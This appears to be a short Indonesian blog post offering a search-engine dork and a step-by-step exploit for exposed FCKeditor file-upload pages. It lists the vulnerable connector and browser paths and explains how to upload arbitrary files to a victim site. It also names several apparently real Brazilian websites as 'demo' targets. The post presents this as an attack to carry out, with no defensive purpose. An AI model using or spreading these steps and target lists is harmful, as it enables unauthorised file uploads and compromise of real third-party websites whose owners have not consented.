#Dork : inurl:/admin/includes/fckeditor/ site:br | USER YOUR BRAIN =))
#Exploit :
http://victim/[PATH]/FCKeditor/editor/filemanager/connectors/uploadtest.html
http://victim/[PATH]/FCKeditor/editor/filemanager/connectors/test.html
http://victim/[PATH]/FCKeditor/editor/filemanager/browser/browser.html
http://victim/[PATH]/FCKeditor/editor/filemanager/browser/frmupload.html
http://victim/[PATH]/FCKeditor/editor/filemanager/upload/test.html
#POC :
1. Search Website Using Dork
2. Select One The Website is available
3. Enter Exploit That Has Available (Ex. i use
http://victim/[PATH]/admin/includes/FCKeditor/editor/filemanager/connectors/uploadtest.html)
4. Select Your File And See Results On http://victim/[PATH]/userfiles/[Your_File].txt
#Demo :
http://www.nostrinx.com.br/admin/include.../test.html
http://espacogourmetblueville.com.br/adm...dtest.html
http://www.emporiodascabeceiras.com.br/a.../test.html
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar